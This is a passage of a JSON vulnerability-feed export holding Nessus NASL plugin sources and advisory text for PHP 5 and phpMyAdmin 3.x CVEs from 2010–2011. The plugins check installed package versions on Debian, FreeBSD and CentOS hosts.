value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several remote vulnerabilities have been discovered in PHP 5, an\nhypertext preprocessor. The Common Vulnerabilities and Exposures\nproject identifies the following problems :\n\n - CVE-2010-1917\n The fnmatch function can be abused to conduct denial of\n service attacks (by crashing the interpreter) by the\n means of a stack overflow.\n\n - CVE-2010-2225\n The SplObjectStorage unserializer allows attackers to\n execute arbitrary code via serialized data by the means\n of a use-after-free vulnerability.\n\n - CVE-2010-3065\n The default sessions serializer does not correctly\n handle a special marker, which allows an attacker to\n inject arbitrary variables into the session and possibly\n exploit vulnerabilities in the unserializer.\n\n - CVE-2010-1128\n For this vulnerability (predictable entropy for the\n Linear Congruential Generator used to generate session\n ids) we do not consider upstream's solution to be\n sufficient. It is recommended to uncomment\n the'session.entropy_file' and 'session.entropy_length'\n settings in the php.ini files. Further improvements can\n be achieved by setting'session.hash_function' to 1 (one)\n and incrementing the value of'session.entropy_length'.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-1917\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-2225\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-3065\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2010-1128\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2010/dsa-2089\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the php5 packages.\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 5.2.6.dfsg.1-1+lenny9.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/08/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"libapache2-mod-php5\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libapache2-mod-php5filter\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php-pear\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-cgi\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-cli\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-common\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-curl\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-dbg\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-dev\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-gd\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-gmp\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-imap\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-interbase\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-ldap\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-mcrypt\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-mhash\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-mysql\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-odbc\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-pgsql\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-pspell\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-recode\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-snmp\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-sqlite\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-sybase\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-tidy\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-xmlrpc\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"php5-xsl\", reference:\"5.2.6.dfsg.1-1+lenny9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:48:52", "description": "The remote host contains a version of phpMyAdmin - 3.3.x less than 3.3.10.2 or 3.4.x less than 3.4.3.1 - that is affected by multiple vulnerabilities :\n\n - An error in the file 'libraries/auth/swekey/swekey.auth.lib.php' allows an attacker to modify the 'SESSION' superglobal array.\n (CVE-2011-2505)\n\n - An error in the file 'setup/lib/ConfigGenerator.class.php' does not properly handle PHP comment-closing delimiters. This can allow an attacker inject static code via a modified 'SESSION' superglobal array. (CVE-2011-2506)\n\n - An error in the file 'libraries/server_synchronize.lib.php' does not properly call the 'preg_replace' function. This can allow an attacker to execute arbitrary code via a modified 'SESSION' superglobal array. (CVE-2011-2507)\n\n - An local file inclusion error exists in the 'PMA_displayTableBody' function in the file 'libraries/display_tbl.lib.php' that can allow an attacker to obtain sensitive information or execute code in file already present on the host.\n (CVE-2011-2508)", "cvss3": {}, "published": "2011-12-20T00:00:00", "type": "nessus", "title": "phpMyAdmin 3.3.x / 3.4.x < 3.3.10.2 / 3.4.3.1 Multiple Vulnerabilities (PMASA-2011-5 - PMASA-2011-8)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "id": "PHPMYADMIN_PMASA_2011_8.NASL", "href": "https://www.tenable.com/plugins/nessus/57346", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57346);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2011-2505\",\n \"CVE-2011-2506\",\n \"CVE-2011-2507\",\n \"CVE-2011-2508\"\n );\n script_bugtraq_id(48563);\n script_xref(name:\"EDB-ID\", value:\"17510\");\n script_xref(name:\"EDB-ID\", value:\"17514\");\n\n script_name(english:\"phpMyAdmin 3.3.x / 3.4.x < 3.3.10.2 / 3.4.3.1 Multiple Vulnerabilities (PMASA-2011-5 - PMASA-2011-8)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a version of phpMyAdmin - 3.3.x less than\n3.3.10.2 or 3.4.x less than 3.4.3.1 - that is affected by multiple\nvulnerabilities :\n\n - An error in the file\n 'libraries/auth/swekey/swekey.auth.lib.php' allows an\n attacker to modify the 'SESSION' superglobal array.\n (CVE-2011-2505)\n\n - An error in the file\n 'setup/lib/ConfigGenerator.class.php' does not properly\n handle PHP comment-closing delimiters. This can allow\n an attacker inject static code via a modified 'SESSION'\n superglobal array. (CVE-2011-2506)\n\n - An error in the file\n 'libraries/server_synchronize.lib.php' does not properly\n call the 'preg_replace' function. This can allow an\n attacker to execute arbitrary code via a modified\n 'SESSION' superglobal array. (CVE-2011-2507)\n\n - An local file inclusion error exists in the\n 'PMA_displayTableBody' function in the file\n 'libraries/display_tbl.lib.php' that can allow an\n attacker to obtain sensitive information or execute\n code in file already present on the host.\n (CVE-2011-2508)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to phpMyAdmin version 3.3.10.2 / 3.4.3.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Phpmyadmin 3.x RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/07/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/20\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_require_keys(\"www/phpMyAdmin\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_http_port(default:80, php:TRUE);\ninstall = get_install_from_kb(appname:\"phpMyAdmin\", port:port, exit_on_fail:TRUE);\n\ndir = install['dir'];\ninstall_url = build_url(port:port,qs:dir);\nversion = install['ver'];\n\nif (version == UNKNOWN_VER)\n exit(1, \"The version of phpMyAdmin located at \"+install_url+\" could not be determined.\");\n\nif (version =~ \"^3(\\.[34])?$\")\n exit(1, \"The version of phpMyAdmin located at \"+install_url+\" (\"+version+\") is not granular enough.\");\n\nif (\n # 3.3.x < 3.3.10.2\n version =~ \"^3\\.3\\.([0-9]|10(\\.[01]|$))($|[^0-9])\" ||\n # 3.4.x < 3.4.3.1\n version =~ \"^3\\.4\\.([0-2]|3(\\.0|$))([^0-9]|$)\"\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 3.3.10.2 / 3.4.3.1' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse exit(0, \"The phpMyAdmin \"+version+\" install at \"+build_url(port:port,qs:dir)+\" is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:43:00", "description": "The phpMyAdmin development team reports :\n\nIt was possible to manipulate the PHP session superglobal using some of the Swekey authentication code. This could open a path for other attacks.\n\nAn unsanitized key from the Servers array is written in a comment of the generated config. An attacker can modify this key by modifying the SESSION superglobal array. This allows the attacker to close the comment and inject code.\n\nThrough a possible bug in PHP running on Windows systems a NULL byte can truncate the pattern string allowing an attacker to inject the /e modifier causing the preg_replace function to execute its second argument as PHP code.\n\nFixed filtering of a file path in the MIME-type transformation code, which allowed for directory traversal.", "cvss3": {}, "published": "2011-07-05T00:00:00", "type": "nessus", "title": "FreeBSD : phpmyadmin -- multiple vulnerabilities (7e4e5c53-a56c-11e0-b180-00216aa06fc2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:phpmyadmin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_7E4E5C53A56C11E0B18000216AA06FC2.NASL", "href": "https://www.tenable.com/plugins/nessus/55502", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55502);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\");\n\n script_name(english:\"FreeBSD : phpmyadmin -- multiple vulnerabilities (7e4e5c53-a56c-11e0-b180-00216aa06fc2)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The phpMyAdmin development team reports :\n\nIt was possible to manipulate the PHP session superglobal using some\nof the Swekey authentication code. This could open a path for other\nattacks.\n\nAn unsanitized key from the Servers array is written in a comment of\nthe generated config. An attacker can modify this key by modifying the\nSESSION superglobal array. This allows the attacker to close the\ncomment and inject code.\n\nThrough a possible bug in PHP running on Windows systems a NULL byte\ncan truncate the pattern string allowing an attacker to inject the /e\nmodifier causing the preg_replace function to execute its second\nargument as PHP code.\n\nFixed filtering of a file path in the MIME-type transformation code,\nwhich allowed for directory traversal.\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-5/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-6/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-7/\"\n );\n # http://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-8/\"\n );\n # https://vuxml.freebsd.org/freebsd/7e4e5c53-a56c-11e0-b180-00216aa06fc2.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a0813c94\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Phpmyadmin 3.x RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/07/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"phpMyAdmin<3.4.3.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:43:35", "description": "Several vulnerabilities were discovered in phpMyAdmin, a tool to administrate MySQL over the web. The Common Vulnerabilities and Exposures project identifies the following problems :\n\n - CVE-2011-2505 Possible session manipulation in Swekey authentication.\n\n - CVE-2011-2506 Possible code injection in setup script, in case session variables are compromised.\n\n - CVE-2011-2507 Regular expression quoting issue in Synchronize code.\n\n - CVE-2011-2508 Possible directory traversal in MIME-type transformation.\n\n - CVE-2011-2642 Cross site scripting in table Print view when the attacker can create crafted table names.\n\n - No CVE name yet\n\n Possible superglobal and local variables manipulation in Swekey authentication. (PMASA-2011-12)\n\nThe oldstable distribution (lenny) is only affected by CVE-2011-2642, which has been fixed in version 2.11.8.1-5+lenny9.", "cvss3": {}, "published": "2011-07-28T00:00:00", "type": "nessus", "title": "Debian DSA-2286-1 : phpmyadmin - several vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507", "CVE-2011-2508", "CVE-2011-2642"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:phpmyadmin", "cpe:/o:debian:debian_linux:6.0"], "id": "DEBIAN_DSA-2286.NASL", "href": "https://www.tenable.com/plugins/nessus/55708", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2286. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(55708);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\", \"CVE-2011-2642\");\n script_bugtraq_id(48563, 48874);\n script_xref(name:\"DSA\", value:\"2286\");\n\n script_name(english:\"Debian DSA-2286-1 : phpmyadmin - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities were discovered in phpMyAdmin, a tool to\nadministrate MySQL over the web. The Common Vulnerabilities and\nExposures project identifies the following problems :\n\n - CVE-2011-2505\n Possible session manipulation in Swekey authentication.\n\n - CVE-2011-2506\n Possible code injection in setup script, in case session\n variables are compromised.\n\n - CVE-2011-2507\n Regular expression quoting issue in Synchronize code.\n\n - CVE-2011-2508\n Possible directory traversal in MIME-type\n transformation.\n\n - CVE-2011-2642\n Cross site scripting in table Print view when the\n attacker can create crafted table names.\n\n - No CVE name yet\n\n Possible superglobal and local variables manipulation in\n Swekey authentication. (PMASA-2011-12)\n\nThe oldstable distribution (lenny) is only affected by CVE-2011-2642,\nwhich has been fixed in version 2.11.8.1-5+lenny9.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2505\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2506\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2507\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2508\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2642\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2642\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/phpmyadmin\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2011/dsa-2286\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the phpmyadmin packages.\n\nFor the stable distribution (squeeze), these problems have been fixed\nin version 3.3.7-6.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Phpmyadmin 3.x RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/07/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"phpmyadmin\", reference:\"3.3.7-6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-02T15:35:58", "description": "Updated php packages that fix multiple security issues are now available for Red Hat Enterprise Linux 4 and 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.\n\nAn input validation flaw was discovered in the PHP session serializer.\nIf a PHP script generated session variable names from untrusted user input, a remote attacker could use this flaw to inject an arbitrary variable into the PHP session. (CVE-2010-3065)\n\nAn information leak flaw was discovered in the PHP var_export() function implementation. If some fatal error occurred during the execution of this function (such as the exhaustion of memory or script execution time limit), part of the function's output was sent to the user as script output, possibly leading to the disclosure of sensitive information. (CVE-2010-2531)\n\nA numeric truncation error and an input validation flaw were found in the way the PHP utf8_decode() function decoded partial multi-byte sequences for some multi-byte encodings, sending them to output without them being escaped. An attacker could use these flaws to perform a cross-site scripting attack. (CVE-2009-5016, CVE-2010-3870)\n\nIt was discovered that the PHP lcg_value() function used insufficient entropy to seed the pseudo-random number generator. A remote attacker could possibly use this flaw to predict values returned by the function, which are used to generate session identifiers by default.\nThis update changes the function's implementation to use more entropy during seeding. (CVE-2010-1128)\n\nIt was discovered that the PHP fnmatch() function did not restrict the length of the pattern argument. A remote attacker could use this flaw to crash the PHP interpreter where a script used fnmatch() on untrusted matching patterns. (CVE-2010-1917)\n\nA NULL pointer dereference flaw was discovered in the PHP XML-RPC extension. A malicious XML-RPC client or server could use this flaw to crash the PHP interpreter via a specially crafted XML-RPC request.\n(CVE-2010-0397)\n\nAll php users should upgrade to these updated packages, which contain backported patches to resolve these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.", "cvss3": {}, "published": "2010-12-02T00:00:00", "type": "nessus", "title": "CentOS 4 / 5 : php (CESA-2010:0919)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-5016", "CVE-2010-0397", "CVE-2010-1128", "CVE-2010-1917", "CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870"], "modified": 